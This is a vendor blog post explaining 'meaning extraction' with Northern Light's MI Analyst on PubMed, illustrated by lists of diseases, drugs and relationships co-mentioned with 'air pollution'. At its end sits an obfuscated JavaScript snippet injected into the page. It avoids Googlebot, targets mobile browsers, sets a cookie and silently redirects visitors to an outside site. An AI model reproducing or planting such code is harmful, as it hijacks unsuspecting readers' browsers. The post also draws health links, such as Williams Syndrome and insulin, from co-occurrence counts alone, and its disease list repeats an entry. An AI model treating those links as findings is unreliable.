How Does Meaning Extraction Actually Work?

Meaning extraction.What exactly is that, you ask?  Other than a catch phrase, one of those one of those unique combinations of words that marketing folks crave to have associated with their brand.I submit this definition of “meaning extraction” for your consideration:

Meaning extraction is an emerging technology that identifies elements of information and concepts contained within documents and document repositories, and surfaces combinations of these informative elements and concepts that imply meaning in the context of the business, professional, or technical purpose of the search process.  Meaning extraction applied to search applications dramatically improves and accelerates a searcher’s ability to gain insight into a topic and answer specific research questions.

Since the above has a theoretical tone that drains all the flash and boom from the concept, I thought it might be useful to provide a real-world example from the pharmaceutical industry.   But as the private meaning extraction applications Northern Light operates for its clients cannot be viewed by anyone but our clients, I will illustrate meaning extraction using a database of research documents that is publicly available.

The National Institutes of Health (NIH) operates PubMed, a research database of journal abstracts that is freely available to researchers in life sciences.  PubMed indexes the abstracts of over 5,000 journals and 18 million scientific articles.  Life sciences researchers can easily access PubMed ( and execute searches using standard keyword search techniques commonly known to any individual that works with a web search engine such as Google.  PubMed returns lists of documents that match the search criteria, relevance ranked, to the user in the traditional method of search engines.  Over 100,000 searches per month are carried out on PubMed.

Separately, the NIH maintains a controlled vocabulary of life sciences terms under its Medical Subject Headings (MeSH) program.  MeSH consists of sets of terms naming descriptors in a hierarchical structure that permits searching at various levels of specificity.  There are thousands of descriptors in MeSH.  Article citations in PubMed are indexed using MeSH and knowledgeable users that understand the structure and term lists of MeSH can use terms from MeSH to search PubMed at multiple levels of aggregation since MeSH is a hierarchical system with inheritance.

As useful as the above system is, it suffers from a severe limitation in that text analytics have not been applied to the PubMed document repository nor to the search technology supporting it.  If you do a search using a text string as a query, you will get a traditional search engine result in the form of a list of documents that contain the search terms.  Like most search engines, these lists of search results are dauntingly long.  And worse, the summary information on the search results often, perhaps most often, provides little help in deciding if the document would actually be helpful.   For example, assume a researcher is interested in finding out what diseases and drugs are related to air pollution.  Using PubMed’s search engine, here are the first five hits on a search on ‘air pollution’:

1: Responses of herbaceous plants to urban air pollution: Effects on growth, phenology and leaf surface characteristics.Honour SL, B Bell JN, Ashenden TW, Cape JN, Power SA.Environ Pollut. 2008 Dec 29. [Epub ahead of print] PMID: 19117655 [PubMed – as supplied by publisher]

2: Long-Term Exposure to Road Traffic Noise and Myocardial Infarction.Selander J, Nilsson ME, Bluhm G, Rosenlund M, Lindqvist M, Nise G, Pershagen G.Epidemiology. 2008 Dec 29. [Epub ahead of print] PMID: 19116496 [PubMed – as supplied by publisher]

3: Urinary 8-oxodeoxyguanosine levels in children exposed to air pollutants.Svecova V, Rossner P Jr, Dostal M, Topinka J, Solansky I, Sram RJ.Mutat Res. 2008 Dec 9. [Epub ahead of print] PMID: 19114049 [PubMed – as supplied by publisher]

4: Air pollution and mutations in the germline: are humans at risk?Somers CM, Cooper DN.Hum Genet. 2008 Dec 27. [Epub ahead of print] PMID: 19112582 [PubMed – as supplied by publisher]

5: Emissions investigation for a novel medical waste incinerator.Xie R, Li WJ, Li J, Wu BL, Yi JQ.J Hazard Mater. 2008 Nov 18. [Epub ahead of print]


There are over 33,000 hits in all.  As you can see, there is no way to actually answer the research question without examining each document in detail.  Good luck! One idea might be to use snippets of the full-text on the search result that would show search terms in context.  Snippets are useful on short documents like web pages and news stories where two to five snippets might well represent the document, but are of greatly reduced value in long documents like research reports. Snippets inherently make a selection of text excerpts to display using some algorithm set by the search technology developer, and only a small number of snippets can be practically displayed for any set of search terms and documents.  When there are far more references to a text string in a document than the number of snippets that can be displayed, the ability of snippets to represent the document in any meaningful way declines sharply.The intellectual frontier in search is meaning extraction.  To support the excellent and comprehensive content in PubMed for life sciences research using meaning extraction, the following steps would be required :

  • Create full-text, metadata, and phrase indexes of the PubMed documents.
  • Convert MeSH terms to forms suitable for entity extraction/text analytics.
  • Extract entities from the PubMed document text using the converted MeSH vocabularies.
  • Create word, phrase, and entity proximity indexes of the PubMed documents.
  • Specify algorithms that can be used by the text analytics technology to discover knowledge.
  • Embody the indexes, extracted entities, proximity intelligence, and analytical algorithms in a user-friendly application that can be used by researchers.

Automated meaning discovery is enabled by the entity extraction, word and phrase indexes, proximity indexes, and analytical algorithms.  With these foundations in place, it is possible to specify algorithms that search automatically across the entire repository for meaning.  For example, an algorithm might be:·

  • Identify all two and three element combinations of Diseases, Therapies, Drugs, Gene, Proteins, and Enzyme names that are within 40 words of each other in documents containing a text string specified by the researcher.

Northern Light has performed these tasks on the PubMed document repository using our meaning extraction platform we call MI Analyst.

At this point, I would like to pause and do a little combinational math.  Our term list for identifying elements of information in the application we have running on PubMed content currently numbers 12,281 terms and phrases.  MI Analyst examines each document for 150 million potential two-element combinations and 1.9 trillion potential three-element combinations, making this information available on each and every user query against the system.  This requires some seriously clever software engineering to accomplish while returning a search result in a second or two.  But more importantly, it illustrates the leveraging of human capacity that meaning extraction technology can bring to bear.

Now let’s return to our research question.  Using the PubMed database of research reports, what diseases are mentioned in the context of air pollution?  With a system like the one above, the researcher enters his or her search terms, “air pollution” in this case, and the search engine returns a list that answers the question directly.

For example, here is the list of diseases found by Northern Light’s MI Analyst meaning extraction application running against the PubMed database and exposed to the user via a single click on the Diseases facet on the search results list:Diseases mentioned in documents with “air pollution”

  1. Asthma (462)
  2. Cough (259)
  3. Rhinitis (133)
  4. Pneumonia (131)
  5. Stroke (129)
  6. Williams Syndrome (76)
  7. Influenza (110)
  8. Bronchitis (105)
  9. Sinusitis (87)
  10. Bronchial Spasm (86)
  11. Silicosis (79)
  12. Bronchiectasis (77)
  13. Hemoptysis (73)
  14. Pulmonary Fibrosis (73)
  15. Atelectasis (72)
  16. Bronchopulmonary Dysplasia (72)
  17. Ciliary Motility Disorders (72)
  18. Pulmonary Hypertension (72)
  19. Anti-Glomerular Basement Membrane Disease (71)
  20. Berylliosis (71)
  21. Hantavirus Pulmonary Syndrome (71)
  22. Lung Neoplasms (71)
  23. Pulmonary Embolism (71)
  24. Lung Neoplasms (71)
  25. Sleep Apnea (48)
  26. Lymphangioleiomyomatosis (45)
  27. Pneumothorax (45)
  28. Tracheobronchomegaly (43)
  29. Pleurisy (29)
  30. Bronchiolitis (25)
  31. Dyspnea (22)
  32. Confusion (32)
  33. Neurologic Disorders (17)
  34. Syncope (14)
  35. Deafness (13)
  36. Multiple Sclerosis (10)


The number following each item represents the count in the PubMed database for documents that have both the element (e.g., Deafness) and the search term (“air pollution”).  In the actual application, every entry in the above lists link to the documents contributing to the result for that line item so the researcher can drill down where he or she sees items of interest.

While elements like Asthma and Rhinitis can hardly be surprising as outcomes related to air pollution,  suppose that the researcher did not already know that Williams Syndrome, Sleep Apnea, or Deafness were implicated as a consequence of air pollution.  In that case, the above results list would be a moment of revelation and discovery.   This is an example of an immediate form of meaning extraction.  By telling the researcher what is in the documents on the results lists, the search technology contributes to the user’s understanding of the topic.  The search engine has evolved from just providing document lists into an analytical tool that can assist in understanding.  This by itself is a great surge ahead.

But it gets better.

Suppose that the researcher wonders what drugs are being discussed as therapy for the diseases he or she identifies using the tool above.  For example, what drugs are being discussed in the 76 papers that mention Williams Syndrome and air pollution?  Using Northern Light MI Analyst and investing a total of three mouse clicks in the analytical process, the researcher sees that the research papers that contain “air pollution” and Williams Syndrome mention these drugs:

  1. Insulin (27)
  2. Bayer ASA (8)
  3. Accutane (1)
  4. Decadron (1)
  5. Folvite (1)
  6. Mucomyst (1)
  7. Neoral (1)


Now, perhaps 10 seconds after starting the process, the researcher knows two new ideas that he or she did not know before: that Williams Syndrome is related to air pollution and that insulin and aspirin may be common treatments for Williams Syndrome in settings when air pollution is mentioned as a factor.  The researcher might then be tempted to consider if these drugs would help with the other diseases related to air pollution, and potentially the process of knowledge creation takes over from that of meaning discovery.

Please imagine the effort to get to this result using traditional search engines.  It is obviously not practical for the researcher to perform exhaustive repetitive searches substituting one disease after another and then one drug name after another in the query with air pollution as there are millions of combinations of these elements.  What our researcher would really do out here in the real world is examine a relatively small sample of documents from the 33,000 on the initial search result and hope for amazing good luck in noticing something relevant, insightful, and unique.

But it gets even better.

The meaning extraction application can be directed to analyze the documents returned on a search result and identify relationships that imply meaning; surfacing those to the researcher to consider.  In our search on air pollution, here are some of the relationships that MI Analyst finds in the PubMed research database:

  1. Osteoporosis is related Skin Disease (82)
  2. Chelation Therapy is related to Williams Syndrome (75)
  3. Atelectasis is realted to Bronchiectasis(72)
  4. Bronchiectasis is related to Hemoptysis (72)
  5. Ciliary Motility Disorder is related to Dyskinesisas (72)


As an aside, it doesn’t require a genius looking at these results to wonder about the relationship between Atelectasis and Hemoptysis.  (MI Analyst actually suggests this as well a little further down on the search result when it considers three-element relationships.)

We like to call these relationships “scenarios” because at the level of MI Analyst, we cannot really tell if they are significant or spurious.  All we can say is that the relationships are there in the document repository, and we can measure how many times each one is there.

MI Analyst identifies these scenarios and presents them to the researcher as possibly worthy of follow-up.  For example, with a few more mouse clicks MI Analyst facilitates investigation of whether there are common elements contributing to the relationship in the form of overlapping genes or proteins or other elements. The identification of the relationships is done automatically for the researcher, without any specific direction other than the initial restriction, in this case, to documents with the text string “air pollution.”  After that, the meaning extraction application analyzes all the text in all the documents of interest and finds the elements and the relationships between them.

In many cases, the researcher will already know about the relationship, and in these cases meaning extraction is helping the researcher narrow down a document list to those that contain the scenarios he or she finds the most interesting.

But in some cases, the researcher will not have previously considered the relationship that is identified –   and then breakthroughs are enabled.  I have been present in the room when a lead researcher for a major pharmaceutical firm spontaneously reacted the scenarios presented on the Northern Light MI Analyst results list he was looking at with the exclamation:  “This is an Ah Ha Moment!”

Now that’s meaning extraction.

 var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}